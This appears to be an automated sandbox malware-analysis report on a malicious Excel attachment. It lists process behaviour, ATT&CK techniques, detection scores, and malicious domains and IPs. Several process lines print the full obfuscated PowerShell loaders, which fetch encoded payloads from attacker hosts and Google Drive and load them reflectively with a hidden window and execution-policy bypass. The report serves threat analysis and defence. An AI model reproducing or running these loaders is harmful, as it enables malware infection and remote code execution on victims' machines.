      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep count: 1340 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3456 Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468 Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564 Thread sleep count: 399 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564 Thread sleep count: 1552 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep count: 8958 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep count: 833 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 Thread sleep time: -17524406870024063s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 Thread sleep time: -2400000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: Process Memory Space: powershell.exe PID: 204, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZh
ZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES955D.tmp" "c:\Users\user\AppData\Local\Temp\td4qmpaq\CSC7C3FCBBFF452466CBE70AA6FD2E366A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzh
zg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
      Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 121 Scripting | Valid Accounts | 121 Command and Scripting Interpreter | 121 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 5 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 4 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Install Root Certificate | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
[Behavior graph. ID: 1540833; Sample: A & C Metrology OC 5457144.xls; Start date: 24/10/2024; Architecture: WINDOWS; Score: 100]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| A & C Metrology OC 5457144.xls | 18% | ReversingLabs | | |
| A & C Metrology OC 5457144.xls | 100% | Joe Sandbox ML | | |
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://ocsp.entrust.net03 | 0% | URL Reputation | safe | |
| https://contoso.com/License | 0% | URL Reputation | safe | |
| http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe | |
| http://go.micros | 0% | URL Reputation | safe | |
| https://contoso.com/ | 0% | URL Reputation | safe | |
| https://nuget.org/nuget.exe | 0% | URL Reputation | safe | |
| http://ocsp.entrust.net0D | 0% | URL Reputation | safe | |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
| http://nuget.org/NuGet.exe | 0% | URL Reputation | safe | |
| http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe | |
| https://contoso.com/Icon | 0% | URL Reputation | safe | |
| https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe | |
| http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 216.58.212.174 | true | false | | unknown |
| drive.usercontent.google.com | 142.250.186.97 | true | false | | unknown |
| u4u.kids | 24.199.88.84 | true | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://192.210.215.8/540/createdbestthingswithniceworkgreath.tIF | true | | unknown |
| http://192.210.215.8/540/wv/uwantskillthingstobegreatthingswitheveryonewithuthat.hta | true | | unknown |
| https://u4u.kids/LUSVbx?&trinket=nice&dynamo=quizzical&job=uppity&imagination=modern&flute=boiling&SUV=motionless&specific=troubled&skyscraper=uninterested&bottling | false | | unknown |
| http://192.210.215.8/540/ERFFDR.txt | true | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious
24.199.88.84 | u4u.kids | United States | 12271 | TWC-12271-NYCUS | false
192.210.215.8 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
216.58.212.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1540833
                                                                                    Start date and time:2024-10-24 08:38:09 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 7m 23s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                    Number of analysed new started processes analysed:30
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • GSI enabled (VBA)
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Sample name:A & C Metrology OC 5457144.xls
                                                                                    Detection:MAL
                                                                                    Classification:mal100.expl.evad.winXLS@31/45@7/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 33.3%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 10
                                                                                    • Number of non-executed functions: 2
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .xls
                                                                                    • Changed system and user locale, location and keyboard layout to French - France
                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                    • Attach to Office via COM
                                                                                    • Active ActiveX Object
                                                                                    • Active ActiveX Object
                                                                                    • Scroll down
                                                                                    • Close Viewer
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 1884 because there are no executed function
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3688 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: A & C Metrology OC 5457144.xls
Time | Type | Description
02:39:28 | API Interceptor | 118x Sleep call for process: mshta.exe modified
02:39:34 | API Interceptor | 909x Sleep call for process: powershell.exe modified
02:39:46 | API Interceptor | 18x Sleep call for process: wscript.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
24.199.88.84 | PO NAHK22012FA000000.docx | malicious | Unknown |
24.199.88.84 | PO NAHK22012FA00000.docx.doc | malicious | Remcos |
24.199.88.84 | Logs.xls | malicious | Lokibot |
24.199.88.84 | Inv No.248740.xls | malicious | Unknown |
24.199.88.84 | InvoiceXCopy.xls | malicious | Snake Keylogger |
192.210.215.8 | createdbestthingswithnewthingsgreatattitudewithnewthignsonherewithme.hta | malicious | Cobalt Strike | 192.210.215.8/680/newbetterthingscometobeonlinewithnewthings.tIF
Match | Associated Sample Name / URL | Detection | Threat Name | Context
u4u.kids | PO NAHK22012FA000000.docx | malicious | Unknown | 24.199.88.84
u4u.kids | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
u4u.kids | Logs.xls | malicious | Lokibot | 24.199.88.84
u4u.kids | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
u4u.kids | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TWC-12271-NYCUS | la.bot.powerpc.elf | malicious | Unknown | 24.168.15.31
TWC-12271-NYCUS | la.bot.mips.elf | malicious | Unknown | 24.90.165.8
TWC-12271-NYCUS | la.bot.m68k.elf | malicious | Unknown | 98.7.19.218
TWC-12271-NYCUS | la.bot.mipsel.elf | malicious | Unknown | 98.7.19.218
TWC-12271-NYCUS | la.bot.mips.elf | malicious | Unknown | 67.244.124.183
TWC-12271-NYCUS | PO NAHK22012FA000000.docx | malicious | Unknown | 24.199.88.84
TWC-12271-NYCUS | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
TWC-12271-NYCUS | Logs.xls | malicious | Lokibot | 24.199.88.84
TWC-12271-NYCUS | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
TWC-12271-NYCUS | byte.mpsl.elf | malicious | Okiru | 68.174.131.114
AS-COLOCROSSINGUS | #PO247762.docx | malicious | Remcos | 104.168.7.51
AS-COLOCROSSINGUS | la.bot.arm7.elf | malicious | Unknown | 192.3.165.37
AS-COLOCROSSINGUS | la.bot.m68k.elf | malicious | Unknown | 107.175.231.193
